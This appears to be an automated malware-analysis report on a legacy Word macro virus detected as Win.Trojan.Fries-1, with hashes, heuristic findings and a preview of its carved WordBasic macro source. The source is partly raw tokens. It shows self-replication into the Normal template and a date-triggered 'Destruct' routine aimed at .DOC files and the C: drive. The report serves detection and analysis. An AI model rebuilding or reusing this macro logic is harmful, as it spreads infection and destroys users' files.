Win.Trojan.Fries-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 fd604ccaf109c36a…

MALICIOUS

Office (OLE)

10.0 KB First seen: 2012-06-14
MD5: 270ef4b986f37491d0a2a15d2257c0c8 SHA-1: a80f90a28cc71ef173d7b2906f2316bc6c6bdb04 SHA-256: fd604ccaf109c36a07893933f235e0dc695a84d4534e84b8af5a62833c68250a
102 Risk Score

Malware Insights

Win.Trojan.Fries-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as a legacy WordBasic macro virus, specifically a "RSN MACRO VIRUS Goat file". This indicates the presence of malicious macros intended to execute arbitrary code. The ClamAV detection further confirms its malicious nature as Win.Trojan.Fries-1. The document body contains numerous macro-related keywords and function names, reinforcing the macro execution attack vector.

Heuristics 3

  • ClamAV: Win.Trojan.Fries-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Fries-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
wordbasic_macros.txt wordbasic-macro analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) 3651 bytes
SHA-256: 92b7aac73cd4a5322a225462ecd9d275e59a36c008ac5c056de2936418e93843
Preview script
First 1,000 lines of the extracted script
= @cmd6e69 29551 =
MAIN
@cmd809e 1
t1 = @cmd80f7
t = t1 = @cmd8100 "0:00:03"
Alarm$ = @cmd8007 @cmd80f4 t = ":" = Kor1$ @cmd80f5 t = ":" = Kor1$ @cmd80ff t
@cmd80b3 Alarm$ , "Begin"
Kor1$ Argument
s$ = @cmd80ea @cmd8007 Argument
Argument 10 s$ = "0" = s$
Kor1$ = s$
MAIN
@cmd809e 1
True = 1 False = 0
Flag_v = False Flag_i = False
count = 1 @cmd80b7 0
name$ = @cmd80b8 count , 0
name$ = = Flag_i = True
name$ = "Fri13" Flag_v = True
count
Flag_i = True
t = t1 = @cmd8100 "0:00:32"
Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13x @cmd80f5 t = ":" = Fri13x @cmd80ff t
@cmd80b3 Alarm$ , =
Flag_v = False
dlg2 @cmd004e
dlg2
name$ = dlg2 = "\" = dlg2 @cmd6400 norm$ = dlg2
Move "AutoOpen" , "AutoOpenf" , name$ , norm$
Move "Begin" , "Beginf" , name$ , norm$
Move "AutoClosex" , "AutoClose" , name$ , norm$
Move "AutoOpenx" , "AutoOpen" , name$ , norm$
Move "AutoOpenx" , "AutoNew" , name$ , norm$
Move "Fri13x" , "Fri13" , name$ , norm$
t = t1 = @cmd8100 "0:00:32"
Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13x @cmd80f5 t = ":" = Fri13x @cmd80ff t
@cmd00d1 = 0
@cmd80b3 Alarm$ , "Fri13"
Move inp$ , outp$ , name$ , norm$
@cmd00de , = name$ , = norm$ , = inp$ , = 3
@cmd00de , = norm$ , = inp$ , = outp$ , = 3
MAIN
True = 1 False = 0
dlg2 @cmd004e
Flag_i = False
count = 1 @cmd80b7 0
name$ = @cmd80b8 count , 0
name$ = = Flag_i = True
count
Flag_i = True
t = t1 = @cmd8100 "0:00:32"
Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13 @cmd80f5 t = ":" = Fri13 @cmd80ff t
@cmd80b3 Alarm$ , =
@cmd8023 = True
@cmd80b7 1 = 0
@cmd0054 = 1
dlg2
name$ = dlg2 = "\" = dlg2 @cmd6400 DelMacro "AutoOpen" , name$
DelMacro "Begin" , name$
DelMacro "AutoClosex" , name$
DelMacro "AutoOpenx" , name$
DelMacro "Fri13x" , name$
dlg2
name$ = dlg2 = "\" = dlg2 @cmd6400 norm$ = dlg2
MoveD "Beginf" , "Begin" , norm$ , name$
MoveD "AutoClose" , "AutoClosex" , norm$ , name$
MoveD "AutoOpen" , "AutoOpenx" , norm$ , name$
MoveD "AutoOpenf" , "AutoOpen" , norm$ , name$
MoveD "Fri13" , "Fri13x" , norm$ , name$
t = t1 = @cmd8100 "0:00:32"
Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13 @cmd80f5 t = ":" = Fri13 @cmd80ff t
@cmd80b3 Alarm$ , "Fri13"
MoveD inp$ , outp$ , nameinp$ , nameout$
@cmd00de , = nameinp$ , = nameout$ , = inp$ , = 3
@cmd00de , = nameout$ , = inp$ , = outp$ , = 3
DelMacro NameMscro$ , NameOut$
True = 1 False = 0
Flag_i = False
count = 1 @cmd80b7 1
name$ = @cmd80b8 count , 1
name$ = NameMscro$ Flag_i = True
count
Flag_i = True @cmd00de , = NameOut$ , = NameMscro$ , = 3
MAIN
True = 1 False = 0
Flag_i = False
count = 1 @cmd80b7 0
name$ = @cmd80b8 count , 0
name$ = = Flag_i = True
count
Flag_i = True
t = t1 = @cmd8100 "0:00:32"
Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13 @cmd80f5 t = ":" = Fri13 @cmd80ff t
@cmd80b3 Alarm$ , =
t = t1 = @cmd8100 "0:00:32"
Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13 @cmd80f5 t = ":" = Fri13 @cmd80ff t
@cmd80b3 Alarm$ , "Fri13"
MAIN
@cmd809e 1
True = 1 False = 0
zader$ = "0:01:00"
Flag_i = False
count = 1 @cmd80b7 0
name$ = @cmd80b8 count , 0
name$ = = Flag_i = True
count
t1 = @cmd80f7
Flag_i = True
t = t1 = @cmd8100 "0:00:32"
Alarm$ = @cmd8007 @cmd80f4 t = ":" = Kor1$ @cmd80f5 t = ":" = Kor1$ @cmd80ff t
@cmd80b3 Alarm$ , =
t = t1 = @cmd8100 zader$
Alarm$ = @cmd8007 @cmd80f4 t = ":" = Kor1$ @cmd80f5 t = ":" = Kor1$ @cmd80ff t
@cmd803a 0 Destruct
@cmd80b3 Alarm$ , "Fri13"
Kor1$ Argument
s$ = @cmd80ea @cmd8007 Argument
Argument 10 s$ = "0" = s$
Kor1$ = s$
Destruct
@cmd80f8 @cmd80f7 = 6 @cmd80f2 @cmd80f7 = 13
@cmd809e 1
@cmd80ab "*.DOC"
@cmd80ab "C:\*.*"
@cmd802b         = @cmd8005 10 = @cmd8005 13 =                           = @cmd8005 10 = @cmd8005 13 =                                               ,                   , 64